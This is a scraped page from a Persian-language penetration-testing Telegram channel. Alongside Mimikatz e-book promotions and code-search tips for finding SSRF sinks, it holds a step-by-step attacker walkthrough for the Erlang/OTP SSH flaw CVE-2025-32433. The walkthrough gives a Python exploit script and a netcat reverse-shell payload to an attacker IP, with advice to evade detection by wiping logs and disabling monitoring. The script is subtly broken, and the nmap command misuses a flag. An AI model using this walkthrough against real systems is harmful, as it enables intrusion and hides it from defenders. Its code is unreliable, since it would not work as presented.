Try Hack Box – Telegram
Try Hack Box
5.76K subscribers
680 photos
65 videos
123 files
689 links
1 Nov 2020
1399/08/11
Learn penetration testing & Red Team
https://youtube.com/@tryhackbox
Channels :
@TryHackBoxOfficial ( RoadMap )
@TryHackBoxStory ( Story Hacking )
Contact : @ThbxSupport
Download Telegram
قسمت چهارم رادیو زیروپاد - نحوه شناسایی یک کلاهبردار با استفاده…
@RadioZeroPod | @TryHackBoxStory
📖 قسمت چهارم رادیو زیروپاد

💠 نحوه شناسایی یک کلاهبردار با استفاده از اوسینت

🔶️ تا به حال فکر کرده اید که پشت این ایمیل ها چه کسی نشسته؟
🔶️ شروع کار: تعیین هدف
🔶️ بررسی اولیه: ردپای دیجیتال
🔶️ شروع بازی: ساخت یک چهره جعلی
🔶️ ابزارهای OSINT مخصوص پی‌پال
🔶️ نتیجه‌گیری: یک گزارش کامل
🔶️ چه سفر پرماجرایی!
🔶️ آموزش گام‌به‌گام روش‌های استفاده‌شده در  داستان "فریب کلاهبردار با OSINT و مهندسی اجتماعی"
🔶️ ابزارهای مورد نیاز برای ساخت وبسایت بی‌خطر
🔶️ سخن پایانی

🧩 لینک برای خواندن مقاله :
Link

📼 با اجرای آریامهر

#RadioZeroPod
@TryHackBoxStory
@RadioZeroPod
👍3
Forwarded from 
آشنایی مقدماتی با mimikatz.pdf
1.1 MB
| آشنایی مقدماتی با Mimikatz 

این کتاب به بررسی ابزار Mimikatz می‌پردازد که برای استخراج پسوردها و اعتبارنامه‌ها از حافظه سیستم استفاده می‌شود. در این کتاب، شما با نحوه کار Mimikatz، قابلیت‌های کلیدی آن، و نمونه‌هایی از APT هکرها که از این ابزار استفاده کرده‌اند آشنا خواهید شد. همچنین، روش‌های مقابله با Mimikatz و عبور از نرم‌افزارهای امنیتی نیز بررسی شده است. 

لینک گیت هاب :
https://github.com/TryHackBox/Books
کانال آموزشی در تلگرام :
https://news.1rj.ru/str/TryHackBox

نویسنده : توییتر من :
https://www.x.com/kavehxnet

@KavehAPT
راهنمای_جامع_ابزار_Mimikatz_راهنمای_هکرها.pdf
4.4 MB
| راهنمای جامع ابزار Mimikatz 
این کتاب به بررسی ابزار Mimikatz می‌پردازد که برای استخراج پسوردها، هش‌ها و توکن‌های دسترسی از حافظه سیستم استفاده می‌شود. در این کتاب، شما با تکنیک‌های پایه تا پیشرفته Mimikatz آشنا خواهید شد، از جمله استخراج اعتبارنامه‌ها، دور زدن مکانیزم‌های امنیتی و افزایش دسترسی. همچنین، نمونه‌هایی از حملات واقعی که از Mimikatz استفاده کرده‌اند و نحوه مقابله با این ابزار بررسی شده است. 

گیت هاب :
https://github.com/TryHackBox/Books
کانال آموزشی در تلگرام :
https://news.1rj.ru/str/TryHackBox

نویسنده : توییتر من :
https://www.x.com/kavehxnet

@KavehAPT
👍2
راهنمای_جامع_ابزار_Mimikatz_راهنمای_هکرها.pdf
به درخواست دوستان کتاب اینجا هم گذاشتیم
👍2
🔍 50 موتور جستجو برای هکرهای اخلاقی

#tools #pentest
@TryHackBox
👍31
This media is not supported in your browser
VIEW IN TELEGRAM
🔎 یکی از ساده ترین راه ها برای پیدا کردن SQL injection با استفاده از جستجوی کد Github

➡️همان مثال برای SSRF:
/file_get_contents\(.*\$_GET|curl_exec\(.*\$_GET/

/(subprocess|exec|spawn|system).*chrome.*--headless/

#bugbounty #pentest #tips
@TryHackBox
@TryHackBoxOfficial
@TryHackBoxStory
@RadioZeroPod
👍7👏2🤩2🔥1
قسمت ششم رادیو زیرو پاد - داستان عجیب نوجوانانی که botnet میرای…
@RadioZeroPod | @TryHackBoxStory
📖 قسمت ششم رادیو زیرو پاد

💠 داستان عجیب نوجوانانی که botnet میرای را ساختند 


🔶️ این داستان واقعی درباره نوجوانانی است که بات‌نت Mirai را ساختند. 

🔶️ میرای توسط چند دانشجو توسعه داده شد که قصد داشتند به دانشگاه خود حمله DDOS انجام دهند. اما در نهایت، این بات‌نت تبدیل به بزرگترین بات‌نت IoT شد و سازندگانش دستگیر و زندانی شدند. 

🔶️ جالب اینجاست که کد Mirai بسیار ساده و کم‌حجم بود و از تکنولوژی پیچیده‌ای استفاده نکرده بود. این بات‌نت تنها با ۳۱ ترکیب نام کاربری و رمز عبور گسترش یافت، اما همین مقدار هم کافی بود تا بیش از ۵۰۰ هزار دستگاه IoT را آلوده کند. 

🧩 لینک برای خواندن مقاله :
Link

📼 با اجرای آریامهر

#RadioZeroPod
@TryHackBoxStory
@RadioZeroPod
👍3🔥3🙏1
آیا TLS امن.pdf
1 MB
🔖 چگونه از WinRMS برای NTLM Relay استفاده کنیم؟

مقاله زیر ابتدا به توضیح درباره پروتکل WinRM و WinRMS پرداخته و سپس نحوه NTLM Relay و اجرای کد در سیستم قربانی از طریق این پروتکل را بیان می‌کند.

🔶️ Blog :
https://sensepost.com/blog/2025/is-tls-more-secure-the-winrms-case./
🔶️ impacket :
https://github.com/fortra/impacket/pull/1947

🔶️ Demo :
https://youtu.be/3mG2Ouu3Umk


@TryHackBox
👍4
Try Hack Box pinned Deleted message
سیسکو تأیید می‌کند که برخی از محصولات آن تحت تأثیر آسیب‌پذیری بحرانی اجرای کد از راه دور در Erlang/OTP با شناسه CVE-2025-32433 قرار گرفته‌اند.

این آسیب‌پذیری که توسط گروهی از محققان دانشگاه روهر در بوخوم (آلمان) کشف شده است، با شناسه CVE-2025-32433 ردیابی می‌شود و به عنوان مشکلی در پردازش پیام‌های پروتکل SSH شرح داده می‌شود که ممکن است به یک مهاجم غیرمجاز اجازه دهد به سیستم‌های آسیب‌پذیر دسترسی پیدا کرده و کد دلخواه اجرا کند.

محققان هشدار دادند که بهره‌برداری از این آسیب‌پذیری می‌تواند منجر به تسلط کامل میزبان‌ها شود که به افراد ثالث اجازه می‌دهد به داده‌های حساس دسترسی غیرمجاز پیدا کرده و آنها را دستکاری کنند، و همچنین حملات نوع DoS انجام دهند.

CVE-2025-32433
در نسخه‌های OTP-27.3.3، OTP-26.2.5.11 و OTP-25.3.2.20 اصلاح شده است. نسخه‌های قبلی تحت تأثیر قرار دارند.

چندی پس از اینکه وجود این آسیب‌پذیری آشکار شد، جامعه متخصصان امنیت سایبری دریافتند که بهره‌برداری از CVE-2025-32433 بسیار ساده است و جزئیات فنی و اسکریپت‌های PoC ظرف ۲۴ ساعت عموماً در دسترس قرار گرفتند.

محققان Qualys معتقدند که پس از کشف این خطا، بسیاری از دستگاه‌ها ممکن است در معرض حملات قرار بگیرند، با توجه به اینکه اکثر دستگاه‌های Cisco و Ericsson از Erlang استفاده می‌کنند.

هر سرویسی که از کتابخانه SSH Erlang/OTP برای دسترسی از راه دور استفاده می‌کند، مانند آنچه در دستگاه‌های OT/IoT و دستگاه‌های محاسبات لبه استفاده می‌شود، در معرض خطر هک قرار دارد.


Arctic Wolf
نیز تأثیر بالقوه را تحلیل کرد و اشاره کرد که علاوه بر Ericsson و Cisco که Erlang را با چندین محصول خود مرتبط کرده‌اند، این نرم‌افزار توسط National Instruments، Broadcom، EMQ Technologies، Very Technology، Apache Software Foundation و Riak Technologies نیز استفاده می‌شود.


با این حال، برای این شرکت‌ها معمولاً نصب جداگانه‌ای از Erlang/OTP مورد نیاز است.

در همین حال، Cisco ادامه می‌دهد تا تأثیر CVE-2025-32433 را ارزیابی کند و گستره‌ای از محصولات مربوط به مسیریابی، سوئیچینگ، محاسبات یکپارچه، مدیریت شبکه و برنامه‌های شبکه را بررسی کند.

در حال حاضر، شرکت به طور قطعی تأیید می‌کند که محصولات ConfD، Network Services Orchestrator (NSO)، Smart PHY، Intelligent Node Manager و Ultra Cloud Core تحت تأثیر قرار گرفته‌اند.

غول شبکه‌ای اشاره کرد که اگرچه ConfD و NSO (که انتظار می‌رود در ماه مه اصلاح شوند) تحت تأثیر آسیب‌پذیری قرار دارند، به دلیل پیکربندی خود، آسیب‌پذیری اجرای کد از راه دور در آنها وجود ندارد.
#cve
@TryHackBox
👍1
Try Hack Box
سیسکو تأیید می‌کند که برخی از محصولات آن تحت تأثیر آسیب‌پذیری بحرانی اجرای کد از راه دور در Erlang/OTP با شناسه CVE-2025-32433 قرار گرفته‌اند. این آسیب‌پذیری که توسط گروهی از محققان دانشگاه روهر در بوخوم (آلمان) کشف شده است، با شناسه CVE-2025-32433 ردیابی…
برای توضیح نحوه بهره‌برداری از آسیب‌پذیری CVE-2025-32433 در Erlang/OTP و پیاده‌سازی حمله، باید ابتدا به جزئیات فنی آسیب‌پذیری و مکانیزم آن توجه کرد. این آسیب‌پذیری مربوط به پردازش نادرست پیام‌های پروتکل SSH است که می‌تواند منجر به اجرای کد از راه دور (RCE) شود. در ادامه، مراحل کلی بهره‌برداری از این آسیب‌پذیری و دستورات مرتبط را بررسی می‌کنیم.

1. شناخت محیط تارگت
قبل از هر چیز، مهاجم باید یک سیستم آسیب‌پذیر را شناسایی کند. این سیستم‌ها معمولاً شامل دستگاه‌هایی هستند که از Erlang/OTP با نسخه‌های مستعد آسیب‌پذیری استفاده می‌کنند. مثال‌هایی از این دستگاه‌ها عبارتند از:
- Cisco NSO و ConfD
- دستگاه‌های OT/IoT
- سیستم‌های مدیریت شبکه


2. شناسایی سرویس SSH قابل دسترس
مهاجم باید سرویس SSH روی سیستم تارگت را شناسایی کند. این کار معمولاً با استفاده از ابزارهایی مانند nmap انجام می‌شود. دستور زیر می‌تواند برای اسکن پورت‌های باز و شناسایی خدمات SSH استفاده شود:

nmap -p 22 <IP_target> --noscript ssh2-enum-algos

این دستور پورت 22 (معمولاً پورت پیش‌فرض SSH) را اسکن کرده و الگوریتم‌های SSH پشتیبانی‌شده توسط سیستم تارگت را شناسایی می‌کند.

3. تهیه ابزار بهره‌برداری (Exploit Script)
با توجه به اینکه PoC (Proof of Concept) برای این آسیب‌پذیری در دسترس عموم قرار گرفته است، مهاجم می‌تواند از این اسکریپت‌ها استفاده کند. این ابزارها معمولاً به صورت اسکریپت‌های Python یا C نوشته می‌شوند.

مثالی از یک اسکریپت بهره‌برداری (فرضی):

import paramiko
import sys

def exploit(ip, port, payload):
try:
# ایجاد اتصال SSH
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())

# ارسال پیام خاصی که آسیب‌پذیری را فعال می‌کند
transport = paramiko.Transport((ip, port))
transport.start_client()

# ارسال پیلود مخرب
transport._send_message(payload)
print("[+] Exploit Sent!")

# اجرا و دسترسی به سیستم
stdin, stdout, stderr = client.exec_command("id")
print(stdout.read().decode())

except Exception as e:
print(f"[-] Failed: {e}")

if __name__ == "__main__":
if len(sys.argv) != 4:
print(f"Usage: {sys.argv[0]} <IP> <Port> <Payload>")
sys.exit(1)

ip = sys.argv[1]
port = int(sys.argv[2])
payload = sys.argv[3]

exploit(ip, port, payload)

4. اجرای حمله
مهاجم می‌تواند از طریق اجرای اسکریپت فوق، حمله را شروع کند. مراحل کلی به شرح زیر است:

الف) آماده‌سازی پیلود
مهاجم باید یک پیلود مخرب تهیه کند که می‌تواند شامل دستورات سیستمی برای اجرای کد از راه دور باشد. مثال:

/bin/bash -c "nc -e /bin/bash <IP_Attacker> <Port>"

این پیلود یک Reverse Shell ایجاد می‌کند که به مهاجم اجازه می‌دهد به سیستم تارگت دسترسی کامل پیدا کند.

ب) اجرای اسکریپت
مهاجم اسکریپت را با آدرس IP، پورت و پیلود مورد نظر اجرا می‌کند:

python3 exploit.py <IP_Target> "/bin/bash -c 'nc -e /bin/bash <IP_attacker> <Port>'"

5. دسترسی به سیستم تارگت
اگر حمله موفق باشد، مهاجم می‌تواند از طریق اتصال Reverse Shell به سیستم تارگت دسترسی کامل پیدا کند. این دسترسی می‌تواند شامل انجام اعمال زیر باشد:
- دستکاری فایل‌ها
- دسترسی به داده‌های حساس
- اجرای دستورات سیستمی
- نصب بدافزار یا Backdoor


6. جلوگیری از تشخیص
مهاجمان معمولاً تلاش می‌کنند ردپای خود را پاک کنند تا از تشخیص حمله جلوگیری کنند. این کار می‌تواند شامل موارد زیر باشد:
- پاک کردن لاگ‌های سیستم (/var/log/)
- غیرفعال کردن ابزارهای مانیتورینگ
- تغییر تنظیمات فایروال یا SSH

7. تأثیرات حمله
در صورت موفقیت، مهاجم می‌تواند:
- کنترل کامل سیستم: دسترسی root یا مدیریتی به دستگاه تارگت.
- حملات DoS: باعث ایجاد اختلال در عملکرد دستگاه شود.
- دسترسی به داده‌های حساس: اطلاعات محرمانه را سرقت یا دستکاری کند.

راهکارهای مقابله
برای جلوگیری از بهره‌برداری از این آسیب‌پذیری، توصیه‌های زیر ارائه می‌شود:
1. به‌روزرسانی Erlang/OTP: نسخه‌های OTP-27.3.3، OTP-26.2.5.11 و OTP-25.3.2.20 را نصب کنید.
2. غیرفعال کردن SSH: اگر استفاده از SSH ضروری نیست، آن را غیرفعال کنید.
3. استفاده از فایروال: دسترسی به پورت SSH را محدود کنید.
4. نظارت بر لاگ‌ها: به دنبال فعالیت‌های مشکوک در لاگ‌های سیستم باشید.
@TryHackBox
👍8
Try Hack Box
برای توضیح نحوه بهره‌برداری از آسیب‌پذیری CVE-2025-32433 در Erlang/OTP و پیاده‌سازی حمله، باید ابتدا به جزئیات فنی آسیب‌پذیری و مکانیزم آن توجه کرد. این آسیب‌پذیری مربوط به پردازش نادرست پیام‌های پروتکل SSH است که می‌تواند منجر به اجرای کد از راه دور (RCE)…
نتیجه‌گیری
آسیب‌پذیری CVE-2025-32433 به دلیل سادگی بهره‌برداری و تأثیرات بالقوه‌اش، تهدیدی جدی برای سیستم‌هایی است که از Erlang/OTP استفاده می‌کنند. مهاجمان می‌توانند از این آسیب‌پذیری برای دسترسی کامل به سیستم‌ها و انجام حملات مختلف استفاده کنند. بنابراین، به‌روزرسانی نرم‌افزارها و اجرای تدابیر امنیتی ضروری است.

⚠️ هشدار: این اطلاعات فقط برای مقاصد آموزشی ارائه شده‌اند و هرگونه استفاده غیرقانونی از آنها ممنوع است.
#cve
@TryHackBox
👍2
کانالهای ما در تلگرام :
@TryHackBox
@TryHackBoxOfficial
@TryHackBoxStory
@RadioZeroPod
👍3
Google Dork by THB.pdf
1019.5 KB
برای درک چگونگی استفاده از موتورهای جستجو (به ویژه گوگل) برای پیداکردن سیستم‌های آسیب‌پذیر، مدتی را به بررسی قابلیت‌های جستجوی پیشرفته در گوگل اختصاص خواهیم داد. با به‌کارگیری اصول مختلف جستجو که درآموزش های بعدی بحث خواهیم کرد....

#GHD #GoogleDork
@TryHackBox
@TryHackBoxOfficial
@TryHackBoxStory
@RadioZeroPod
👍5🔥1
📚 کتابچه "Mimikatz: تسلط عملی بر تکنیک‌های پیشرفته حملات Active Directory" از مقدماتی تا پیشرفته.

اگر در حوزه امنیت سایبری و تست نفوذ Active Directory فعالیت میکنید، این کتابچه ضروریترین منبعی است که میتوانید داشته باشید!

منبعی کامل برای تیم‌های قرمز (Red Team)، شامل دستورات عملی، اسکریپت‌های آماده، و تکنیک‌های evasion است که مستقیماً در تست‌های نفوذ استفاده میشوند.


همین حالا این کتاب تخصصی را به زبان فارسی بخوانید.

🔥 عرضه ویژه اولین فروش: 
💰 قیمت اصلی: ۲۵۰,۰۰۰ تومان 
💥 با ۴۰٪ تخفیف: فقط ۱۵۰,۰۰۰ تومان 

⚠️ مهلت تخفیف: تنها ۵ روز دیگر! 


📌 جهت خرید و کسب اطلاعات بیشتر، به ایدی زیر پیام دهید:
@THBxSupport
👍1